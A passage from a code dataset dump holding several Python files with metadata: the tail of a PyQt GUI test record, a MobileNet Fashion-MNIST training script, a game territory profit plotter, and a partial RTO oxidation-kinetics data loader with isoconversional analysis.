True\n\nlist = [cube_diagonal, u_bahn, view_control]\n", "repo_name": "kozintsev/kubos-research", "sub_path": "actions/unit_test.py", "file_name": "unit_test.py", "file_ext": "py", "file_size_in_byte": 2442, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "86", "api": [{"api_name": "lib.qtest.init", "line_number": 14, "usage_type": "call"}, {"api_name": "gui.win", "line_number": 14, "usage_type": "argument"}, {"api_name": "lib.qtest", "line_number": 14, "usage_type": "name"}, {"api_name": "PyQt4.QtTest.QTest.keyPress", "line_number": 18, "usage_type": "call"}, {"api_name": "PyQt4.QtTest.QTest", "line_number": 18, "usage_type": "name"}, {"api_name": "gui.win.viewer_3d", "line_number": 18, "usage_type": "attribute"}, {"api_name": "gui.win", "line_number": 18, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.Key_P", "line_number": 18, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 18, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.AltModifier", "line_number": 18, "usage_type": "attribute"}, {"api_name": "lib.qtest.click_at", "line_number": 19, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 19, "usage_type": "name"}, {"api_name": "lib.qtest.click_at", "line_number": 20, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 20, "usage_type": "name"}, {"api_name": "lib.qtest.click_at", "line_number": 21, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 21, "usage_type": "name"}, {"api_name": "PyQt4.QtTest.QTest.keyPress", "line_number": 22, "usage_type": "call"}, {"api_name": "gui.win", "line_number": 22, "usage_type": "argument"}, {"api_name": "PyQt4.QtTest.QTest", "line_number": 22, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.Key_X", "line_number": 22, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 22, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.AltModifier", "line_number": 22, "usage_type": "attribute"}, {"api_name": "lib.qtest.click_at", "line_number": 23, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 23, "usage_type": "name"}, {"api_name": "lib.qtest.click_at", "line_number": 24, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 24, "usage_type": "name"}, {"api_name": "PyQt4.QtTest.QTest.keyPress", "line_number": 25, "usage_type": "call"}, {"api_name": "gui.win", "line_number": 25, "usage_type": "argument"}, {"api_name": "PyQt4.QtTest.QTest", "line_number": 25, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.Key_Space", "line_number": 25, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 25, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.NoModifier", "line_number": 25, "usage_type": "attribute"}, {"api_name": "lib.qtest.click_at", "line_number": 26, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 26, "usage_type": "name"}, {"api_name": "PyQt4.QtTest.QTest.keyPress", "line_number": 27, "usage_type": "call"}, {"api_name": "gui.win", "line_number": 27, "usage_type": "argument"}, {"api_name": "PyQt4.QtTest.QTest", "line_number": 27, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.Key_G", "line_number": 27, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 27, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.ControlModifier", "line_number": 27, "usage_type": "attribute"}, {"api_name": "lib.qtest.click_at", "line_number": 28, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 28, "usage_type": "name"}, {"api_name": "PyQt4.QtTest.QTest.keyPress", "line_number": 29, "usage_type": "call"}, {"api_name": "gui.win", "line_number": 29, "usage_type": "argument"}, {"api_name": "PyQt4.QtTest.QTest", "line_number": 29, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.Key_Space", "line_number": 29, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 29, "usage_type": "name"}, {"api_name": "PyQt4.QtTest.QTest.keyPress", "line_number": 30, "usage_type": "call"}, {"api_name": "gui.win", "line_number": 30, "usage_type": "argument"}, {"api_name": "PyQt4.QtTest.QTest", "line_number": 30, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.Key_Space", "line_number": 30, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 30, "usage_type": "name"}, {"api_name": "lib.qtest.click_at", "line_number": 31, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 31, "usage_type": "name"}, {"api_name": "lib.action.Action", "line_number": 32, "usage_type": "call"}, {"api_name": "PyQt4.QtTest.QTest.keyPress", "line_number": 37, "usage_type": "call"}, {"api_name": "PyQt4.QtTest.QTest", "line_number": 37, "usage_type": "name"}, {"api_name": "gui.win.viewer_3d", "line_number": 37, "usage_type": "attribute"}, {"api_name": "gui.win", "line_number": 37, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.Key_B", "line_number": 37, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 37, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.ControlModifier", "line_number": 37, "usage_type": "attribute"}, {"api_name": "lib.qtest.mouse_move", "line_number": 38, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 38, "usage_type": "name"}, {"api_name": "PyQt4.QtTest.QTest.keyPress", "line_number": 39, "usage_type": "call"}, {"api_name": "PyQt4.QtTest.QTest", "line_number": 39, "usage_type": "name"}, {"api_name": "gui.win.viewer_3d", "line_number": 39, "usage_type": "attribute"}, {"api_name": "gui.win", "line_number": 39, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.Key_C", "line_number": 39, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 39, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.NoModifier", "line_number": 39, "usage_type": "attribute"}, {"api_name": "PyQt4.QtTest.QTest.keyPress", "line_number": 40, "usage_type": "call"}, {"api_name": "PyQt4.QtTest.QTest", "line_number": 40, "usage_type": "name"}, {"api_name": "gui.win.command_dock_widget", "line_number": 40, "usage_type": "attribute"}, {"api_name": "gui.win", "line_number": 40, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.Key_Z", "line_number": 40, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 40, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.NoModifier", "line_number": 40, "usage_type": "attribute"}, {"api_name": "PyQt4.QtTest.QTest.keyPress", "line_number": 41, "usage_type": "call"}, {"api_name": "PyQt4.QtTest.QTest", "line_number": 41, "usage_type": "name"}, {"api_name": "gui.win.command_dock_widget", "line_number": 41, "usage_type": "attribute"}, {"api_name": "gui.win", "line_number": 41, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.Key_Minus", "line_number": 41, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 41, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.NoModifier", "line_number": 42, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 42, "usage_type": "name"}, {"api_name": "PyQt4.QtTest.QTest.keyPress", "line_number": 43, "usage_type": "call"}, {"api_name": "PyQt4.QtTest.QTest", "line_number": 43, "usage_type": "name"}, {"api_name": "gui.win.command_dock_widget", "line_number": 43, "usage_type": "attribute"}, {"api_name": "gui.win", "line_number": 43, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.Key_1", "line_number": 43, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 43, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.NoModifier", "line_number": 43, "usage_type": "attribute"}, {"api_name": "PyQt4.QtTest.QTest.keyPress", "line_number": 44, "usage_type": "call"}, {"api_name": "PyQt4.QtTest.QTest", "line_number": 44, "usage_type": "name"}, {"api_name": "gui.win.command_dock_widget", "line_number": 44, "usage_type": "attribute"}, {"api_name": "gui.win", "line_number": 44, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.Key_Return", "line_number": 44, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 44, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.NoModifier", "line_number": 45, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 45, "usage_type": "name"}, {"api_name": "lib.qtest.mouse_move", "line_number": 46, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 46, "usage_type": "name"}, {"api_name": "PyQt4.QtTest.QTest.keyPress", "line_number": 47, "usage_type": "call"}, {"api_name": "PyQt4.QtTest.QTest", "line_number": 47, "usage_type": "name"}, {"api_name": "gui.win.command_dock_widget", "line_number": 47, "usage_type": "attribute"}, {"api_name": "gui.win", "line_number": 47, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.Key_Return", "line_number": 47, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 47, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.NoModifier", "line_number": 48, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 48, "usage_type": "name"}, {"api_name": "lib.qtest.click_at", "line_number": 49, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 49, "usage_type": "name"}, {"api_name": "lib.qtest.click_at", "line_number": 51, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 51, "usage_type": "name"}, {"api_name": "lib.qtest.click_at", "line_number": 52, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 52, "usage_type": "name"}, {"api_name": "lib.qtest.click_at", "line_number": 53, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 53, "usage_type": "name"}, {"api_name": "lib.qtest.click_at", "line_number": 54, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 54, "usage_type": "name"}, {"api_name": "lib.qtest.click_at", "line_number": 56, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 56, "usage_type": "name"}, {"api_name": "lib.qtest.click_at", "line_number": 57, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 57, "usage_type": "name"}, {"api_name": "lib.qtest.click_at", "line_number": 58, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 58, "usage_type": "name"}, {"api_name": "lib.qtest.click_at", "line_number": 59, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 59, "usage_type": "name"}, {"api_name": "lib.qtest.click_at", "line_number": 61, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 61, "usage_type": "name"}, {"api_name": "lib.qtest.click_at", "line_number": 62, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 62, "usage_type": "name"}, {"api_name": "lib.qtest.click_at", "line_number": 63, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 63, "usage_type": "name"}, {"api_name": "lib.qtest.click_at", "line_number": 64, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 64, "usage_type": "name"}, {"api_name": "PyQt4.QtTest.QTest.keyPress", "line_number": 65, "usage_type": "call"}, {"api_name": "PyQt4.QtTest.QTest", "line_number": 65, "usage_type": "name"}, {"api_name": "gui.win.viewer_3d", "line_number": 65, "usage_type": "attribute"}, {"api_name": "gui.win", "line_number": 65, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.Key_Escape", "line_number": 65, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 65, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.NoModifier", "line_number": 65, "usage_type": "attribute"}, {"api_name": "lib.action.Action", "line_number": 66, "usage_type": "call"}, {"api_name": "lib.qtest.click_at", "line_number": 70, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 70, "usage_type": "name"}, {"api_name": "lib.qtest.click_at", "line_number": 71, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 71, "usage_type": "name"}, {"api_name": "lib.action.Action", "line_number": 72, "usage_type": "call"}]} +{"seq_id": "2823773315", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom tqdm import tqdm\nfrom skimage.transform import resize\nfrom tensorflow.keras import backend as K\nimport os\n\ndef create_model():\n\n# load MobileNet v2 and construct a classifier\n\n\tmbnet = tf.keras.applications.MobileNet(\n\t\tinput_shape = (56, 56, 3),\n\t\tinclude_top = False,\n\t\tpooling = 'avg')\n\n\tpred_layer = tf.keras.layers.Dense(10, activation='softmax')\n\n\tinputs = tf.keras.Input(shape = (56, 56))\n\tinput_image_ = tf.keras.layers.Lambda(lambda x: K.repeat_elements(K.expand_dims(x,3),3,3))(inputs)\n\tx = mbnet(input_image_)\n\tx = tf.keras.layers.Dropout(0.5)(x)\n\toutputs = pred_layer(x)\n\tmodel = tf.keras.Model(inputs, outputs)\n\n\tmodel.compile(optimizer = tf.keras.optimizers.Adam(lr=0.001),\n\t\tloss = 'sparse_categorical_crossentropy',\n\t\tmetrics = ['accuracy'])\n\tmodel.summary()\n\n\treturn model\n\n\ndef main():\n\n\t# load training and testing data from fashion mnist\n\n\tfashion_mnist = tf.keras.datasets.fashion_mnist\n\t(train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()\n\n\t# resize the images to 56x56\n\n\theight, width = 56, 56\n\n\ttrain_images = train_images.reshape((-1,28,28))\n\ttrain_images = np.array([resize(x, (height,width)).astype(float) for x in tqdm(iter(train_images))])/255.\n\n\ttest_images = test_images.reshape((-1,28,28))\n\ttest_images = np.array([resize(x, (height,width)).astype(float) for x in tqdm(iter(test_images))])/255.\n\n\tprint(train_images.shape)\n\n\tmodel = create_model()\n\n\tweight_path = \"./weights-3/cp-{epoch:04d}.ckpt\"\n\n\tbatch_size = 128\n\n\tcallback = tf.keras.callbacks.ModelCheckpoint(\n\t\tfilepath = weight_path,\n\t\tverbose = 1,\n\t\tsave_weights_only = True,\n\t\tsave_freq = 5*batch_size)\n\n\thistory = model.fit(train_images, train_labels, batch_size=batch_size, epochs=50, callbacks = [callback], validation_data = (test_images, test_labels))\n\nif __name__ == '__main__':\n\tmain()", "repo_name": "StevenLu1204/Coding-exercise-with-FashionMNIST", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 1897, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "tensorflow.keras.applications.MobileNet", "line_number": 13, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 13, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 18, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 18, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.Input", "line_number": 20, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 20, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Lambda", "line_number": 21, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 21, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.backend.repeat_elements", "line_number": 21, "usage_type": "call"}, {"api_name": "tensorflow.keras.backend", "line_number": 21, "usage_type": "name"}, {"api_name": "tensorflow.keras.backend.expand_dims", "line_number": 21, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dropout", "line_number": 23, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 23, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.Model", "line_number": 25, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 25, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.optimizers.Adam", "line_number": 27, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 27, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 39, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 47, "usage_type": "call"}, {"api_name": "skimage.transform.resize", "line_number": 47, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 50, "usage_type": "call"}, {"api_name": "skimage.transform.resize", "line_number": 50, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 50, "usage_type": "call"}, {"api_name": "tensorflow.keras.callbacks.ModelCheckpoint", "line_number": 60, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 60, "usage_type": "attribute"}]} +{"seq_id": "37409264766", "text": "import pandas as pd\nimport matplotlib.pyplot as plt\n\ndef main():\n\t\"\"\"\n\timport data from csv file, plot multi line graph, and save it.\n\t\"\"\"\n\n\tdf = pd.read_csv(\"Ohono_Territories.csv\")\n\n\tprint(df.head())\n\n\tsmall_df = df[[\"Territory\",\"3\",\"4\",\"2\",\"1\"]]\n\tsmall_df[\"4\"]=small_df[\"4\"].astype(float)\n\tsmall_df[\"3\"]=small_df[\"3\"].astype(float)\n\tsmall_df[\"2\"]=small_df[\"2\"].astype(float)\n\tsmall_df[\"1\"]=small_df[\"1\"].astype(float)\n\tprint(small_df.head())\n\tsmall_df=small_df.pivot_table(columns=\"Territory\")\n\tsmall_df = small_df[[\n\t# \"Restless Shores\", \n\t\"Monarch's Bluffs\",\n\t # \"Reekwater\", \n\t \"Weaver's Fen\", \n\t \"Cutlass Keys\", \n\t \"Mourningdale\", \n\t \"First Light\", \n\t # \"Brightwood\", \n\t \"Everfall\", \n\t # \"Windsward\", \n\t \"Ebonscale Reach\",\n\t ]]\n\tprint(small_df.head())\n\tax = small_df.plot(ylim=(0,2100000), lw=2, marker='.', markersize=10, title='Profits by Territory', grid=True)\n\t# ax.set(xlabel=\"Week\", ylabel=\"Profit in Coin\")\n\tax.set_ylabel(\"Profit in Coin\", labelpad=0)\n\tax.set_xlabel(\"Week\")\n\tplt.legend(ncol=2)\n\tax.get_figure().savefig(\"Profits_Non_Yellow.png\")\n\treturn 0\n\nif __name__ == \"__main__\":\n\tmain()", "repo_name": "eparrish64/NewWorld_TerritoryProfitTracking", "sub_path": "Territory_Profit_Plotting.py", "file_name": "Territory_Profit_Plotting.py", "file_ext": "py", "file_size_in_byte": 1105, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "pandas.read_csv", "line_number": 9, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}]} +{"seq_id": "30091337539", "text": "import numpy as np \nimport pandas as pd\nimport networkx as nx\nimport glob, os, warnings\nimport matplotlib.pyplot as plt\n\nfrom scipy.stats import linregress\nfrom scipy.integrate import trapz, cumtrapz\nfrom scipy.optimize import minimize\nfrom sklearn.cluster import KMeans, SpectralClustering\n\n\nfrom .base_data import BaseData\nfrom utils.utils import isoconversional_analysis\n\n\ndef load_rto_data(data_path, clean_data = True, return_O2_con_in = False):\n\n df = pd.read_excel(data_path + '.xls')\n \n # Read in data\n Time = df.Time.values/60\n O2 = df.O2.values\n CO2 = df.CO2.values\n Temp = df.Temperature.values\n \n ind100C = np.amin(np.asarray(Temp > 100).nonzero())\n ind120C = np.amin(np.asarray(Temp > 120).nonzero())\n T_max = np.amax(Temp)\n inds750 = np.asarray(Temp > T_max - 5).nonzero()[0]\n if inds750.shape[0] < 10:\n ind750C1 = Temp.shape[0]-3\n ind750C2 = Temp.shape[0]-2\n else:\n ind750C1 = inds750[np.round(0.75*inds750.shape[0]).astype(int)]\n ind750C2 = inds750[np.round(0.9*inds750.shape[0]).astype(int)]\n\n\n # Gather datapoints and perform linear regression correction\n correction_times = np.concatenate([Time[ind100C:ind120C+1], Time[ind750C1:ind750C2+1]])\n correction_O2s = np.concatenate([O2[ind100C:ind120C+1], O2[ind750C1:ind750C2+1]])\n slope, intercept, _, _, _ = linregress(correction_times, correction_O2s)\n O2_baseline = slope*Time + intercept\n O2_con_in = intercept\n\n\n # Calculate %O2 consumption and conversion\n O2_consumption = np.maximum(O2_baseline - O2, 0)\n\n start_ind_max, end_ind_max_O2 = find_start_end(O2_consumption)\n O2_consumption[:start_ind_max] = 0\n O2_consumption[end_ind_max_O2:] = 0\n\n # correct O2s\n correction_CO2s = np.concatenate([CO2[ind100C:ind120C+1], CO2[ind750C1:ind750C2+1]])\n slope, intercept, _, _, _ = linregress(correction_times, correction_CO2s)\n CO2_baseline = slope*Time + intercept\n CO2_production = np.maximum(CO2 - CO2_baseline, 0)\n\n start_ind_max, end_ind_max_CO2 = find_start_end(CO2_production)\n CO2_production[:start_ind_max] = 0\n CO2_production[end_ind_max_CO2:] = 0 \n\n # remove final times\n global_max_ind = max(end_ind_max_O2, end_ind_max_CO2)\n Time = Time[:global_max_ind]\n Temp = Temp[:global_max_ind]\n O2_consumption = O2_consumption[:global_max_ind]\n CO2_production = CO2_production[:global_max_ind]\n \n ydict = {'Time': Time, 'Temp': Temp, 'O2_consumption': O2_consumption, 'O2_con_in': O2_con_in, \n 'CO2_production': CO2_production}\n \n return ydict\n \n\ndef find_start_end(x):\n '''\n Find start and end time stamps from array x\n \n '''\n \n start_ind = 0\n end_ind = 0\n start_ind_max = 0\n end_ind_max = x.shape[0]\n cumsum = 0.0\n max_cumsum = 0.0\n for i in range(x.shape[0]):\n if x[i] <= 0:\n if cumsum > max_cumsum:\n max_cumsum = cumsum\n start_ind_max = start_ind\n end_ind_max = end_ind\n \n cumsum = 0.0\n start_ind = i\n end_ind = i\n \n else:\n cumsum += x[i]\n end_ind += 1\n \n return start_ind_max, end_ind_max\n\n\nclass RtoData(BaseData):\n\n @staticmethod\n def modify_cmd_options(parser):\n parser.set_defaults(data_dir=os.path.join('datasets', 'RTO'))\n parser.add_argument('--data_from_default', type=str, default='None', help='load data from simulating default reaction')\n parser.add_argument('--dataset', type=str, default='synthetic', help='name of dataset to load from \\'datasets/RTO\\' directory')\n parser.add_argument('--Oil_con_init', type=float, default=0.04, help='initial concentration of oil in kinetic cell')\n parser.add_argument('--interp_num', type=int, default=200, help='number of points to interpolate experimental data onto')\n return parser\n\n\n def __init__(self, opts):\n super().__init__(opts)\n\n\n def data_load(self, opts):\n '''\n Parse the input data file for experimental data kinetic cell models\n\n '''\n\n self.Oil_con_init = opts.Oil_con_init\n\n self.heating_rates = [float(name[:-9]) for name in os.listdir(self.dataset_dir) if name[-9:].lower()=='c_min.xls']\n\n # Begin loading data\n self.heating_data = {}\n self.O2_con_in = []\n INTERPNUM = 200\n \n for hr in self.heating_rates:\n print('Loading heating rate {}...'.format(hr))\n # Read RTO data\n ydict = load_rto_data(os.path.join(self.dataset_dir, str(hr)+'C_min'))\n \n # Downsample and append\n time_downsampled = np.linspace(ydict['Time'].min(), ydict['Time'].max(), num=INTERPNUM)\n Temp_ds = np.interp(time_downsampled, ydict['Time'], ydict['Temp'])\n O2_consumption_ds = np.interp(time_downsampled, ydict['Time'], ydict['O2_consumption']/100)\n CO2_production_ds = np.interp(time_downsampled, ydict['Time'], ydict['CO2_production']/100)\n\n self.heating_data[hr] = {'Time': time_downsampled, 'Temp': Temp_ds, 'O2': O2_consumption_ds, 'CO2': CO2_production_ds, 'O2_con_in': ydict['O2_con_in']/100}\n\n \n def print_curves(self, save_path = None):\n\n plt.figure()\n for hr in sorted(self.heating_data.keys()):\n plt.plot(self.heating_data[hr]['Time'], self.heating_data[hr]['O2'])\n plt.xlabel('Time [min]')\n plt.ylabel('O2 consumption [% mol]')\n plt.title('O2 consumption for experiments')\n plt.legend([str(hr) for hr in sorted(self.heating_data.keys())])\n\n if isinstance(save_path, str):\n plt.savefig(save_path[:-4] + '_consumption' + save_path[-4:])\n else:\n plt.show()\n\n plt.figure()\n for hr in sorted(self.heating_data.keys()):\n plt.plot(self.heating_data[hr]['Time'], self.heating_data[hr]['Temp'])\n plt.xlabel('Time [min]')\n plt.ylabel('Temperature [C]')\n plt.title('Temperature profiles for experiments')\n plt.legend([str(hr) for hr in sorted(self.heating_data.keys())])\n\n if isinstance(save_path, str):\n plt.savefig(save_path[:-4] + '_temperature' + save_path[-4:])\n else:\n plt.show()\n\n\n def get_heating_data(self):\n \n '''\n Get dictionary of times and temperature data.\n\n '''\n hr_dict = {}\n for hr in self.heating_rates:\n Time, Temp, _ = self.heating_data[hr]\n hr_dict[hr] = {'Time': Time, 'Temp': Temp}\n \n return hr_dict\n\n\n def get_initial_condition(self, species, hr):\n '''\n Query initial conditions based on the heating rate and the species. \n\n '''\n \n if species == 'O2':\n return self.O2_con_in[self.heating_rates.index(hr)]\n elif species == 'Oil':\n return self.Oil_con_init\n elif species == 'T':\n return self.heating_data[hr]['Temp'][0]\n else:\n return 0.0\n \n \n def print_isoconversional_curves(self, save_path=None, corrected = False):\n conv_grid, O2_eact, O2_rorder, O2_preexp = isoconversional_analysis(self.heating_data, corrected=corrected)\n \n plt.figure()\n plt.plot(conv_grid, O2_eact)\n plt.xlabel('O2 conversion [% mol]')\n plt.ylabel('Activation energy [J/mol]]')\n plt.title('O2 activation energy')\n\n if isinstance(save_path, str):\n plt.savefig(save_path[:-4] + '_O2_eact' + save_path[-4:])\n else:\n plt.show()\n \n plt.figure()\n plt.plot(conv_grid, O2_rorder)\n plt.xlabel('O2 conversion [% mol]')\n plt.ylabel('Reaction Order')\n plt.title('O2 conversion reaction order')\n\n if isinstance(save_path, str):\n plt.savefig(save_path[:-4] + '_O2_rorder' + save_path[-4:])\n else:\n plt.show()\n \n plt.figure()\n plt.plot(conv_grid, np.exp(O2_preexp))\n plt.xlabel('O2 conversion [% mol]')\n plt.ylabel('Pre-exponential factor')\n plt.title('O2 conversion pre-exponential factor')\n\n if isinstance(save_path, str):\n plt.savefig(save_path[:-4] + '_O2_preexp' + save_path[-4:])\n else:\n plt.show()\n \n\n def compute_kinetics_params(self, num_rxns, return_labels=False):\n \n conv_grid, O2_eact, _, O2_preexp = isoconversional_analysis(self.heating_data, corrected=True)\n \n conv_grid_fit = (conv_grid - np.mean(conv_grid)) / np.std(conv_grid)\n O2_eact_fit = (O2_eact - np.mean(O2_eact)) / np.std(O2_eact)\n \n labels = SpectralClustering(n_clusters=num_rxns, affinity='nearest_neighbors', n_neighbors=10).fit_predict(np.concatenate((np.expand_dims(conv_grid_fit,1), \n np.expand_dims(O2_eact_fit,1)),axis=1))\n \n # Transform labels to be ascending order of conversion value\n mean_convs = [np.mean(np.array(conv_grid)[labels==i]) for i in range(num_rxns)]\n label_sort_inds = sorted(range(num_rxns),key=mean_convs.__getitem__)\n labels = [label_sort_inds.index(l) for l in labels]\n \n act_eng = [np.mean(np.array(O2_eact)[np.equal(labels,i)]) for i in range(num_rxns)]\n pre_exp = [np.exp(np.mean(np.array(O2_preexp)[np.equal(labels,i)])) for i in range(num_rxns)]\n \n if return_labels:\n return pre_exp, act_eng, labels\n else:\n return pre_exp, act_eng\n \n \n def print_isoconversional_overlay(self, num_rxns=None, save_path=None):\n \n if num_rxns is None:\n raise Exception('Must enter number of oxygenated reactions.')\n \n conv_grid, O2_eact, _, _ = isoconversional_analysis(self.heating_data, corrected=True)\n _, e_acts, labels = self.compute_kinetics_params(num_rxns, return_labels=True)\n \n plt.figure()\n plt.plot(conv_grid, O2_eact)\n plt.xlabel('O2 conversion [% mol]')\n plt.ylabel('Activation energy [J/mol]]')\n plt.title('O2 activation energy')\n \n for i in range(num_rxns):\n convs = np.array(conv_grid)[np.equal(labels,i)]\n eacts = e_acts[i]*np.ones_like(convs)\n plt.scatter(convs, eacts)\n \n plt.legend(['Observed Activation Energy']+['Reaction {}'.format(i+1) for i in range(num_rxns)])\n\n if isinstance(save_path, str):\n plt.savefig(save_path[:-4] + '_isconversional_overlay' + save_path[-4:])\n \n plt.show()\n\n\n def compute_bounds(self, param_types, log_params=True):\n '''\n Compute bounds for each parameter based on the data\n\n '''\n _, O2_eact, _, O2_preexp = isoconversional_analysis(self.heating_data, corrected=True)\n\n eact_min = np.maximum(np.amin(O2_eact), 1e3)\n eact_max = np.minimum(np.amax(O2_eact), 1e6)\n\n preexp_min = np.maximum(np.amin(np.exp(O2_preexp)), 1e-2)\n preexp_max = np.minimum(np.amax(np.exp(O2_preexp)), 1e3)\n\n if log_params:\n eact_min, eact_max = np.log(eact_min)-1, np.log(eact_max)+1\n preexp_min, preexp_max = np.log(preexp_min), np.log(preexp_max)\n\n bnds = []\n\n for p in param_types:\n if p[0] == 'acteng':\n bnds.append((eact_min, eact_max))\n elif p[0] == 'preexp':\n bnds.append((preexp_min, preexp_max))\n elif p[0] == 'stoic':\n bnds.append((1e-2, 50))\n\n\n return bnds\n \n \n def compute_initial_guess(self, reac_names, prod_names, res, param_types, log_params=True):\n '''\n Inputs:\n reac_names - list of reactant names for every reaction\n prod_names - list of product names for every reaction\n res - function res(x) that computes the sum of squared residuals from an input parameter vector x\n param_types - list of parameter types \n log_params - if log of pre-exponential factors and activation energy being used\n \n Returns: \n x0 - initial guess for the parameters vector\n \n '''\n \n # Initialize parameter vector\n x0 = np.ones((len(param_types)))\n num_rxns = len(reac_names)\n \n # Begin building initial guess for pre-exponential factor and activation energies\n oxy_rxns= [i for i, r in enumerate(reac_names) if 'O2' in r]\n num_oxy_rxns = len(oxy_rxns)\n \n # Get guesses for oxygen-containing reactions\n pre_exp, act_engs = self.compute_kinetics_params(num_oxy_rxns)\n \n # Get distance scores for each reaction\n fuel_names = []\n comp_names = list(set([comp for reac_prod in reac_names+prod_names for comp in reac_prod]))\n for c in comp_names:\n if len(c)>=3:\n if c[:3]=='Oil':\n fuel_names.append(c)\n if len(c)>=4:\n if c[:4]=='Coke':\n fuel_names.append(c)\n \n # Build fuel graph\n G = nx.Graph()\n G.add_nodes_from(fuel_names)\n 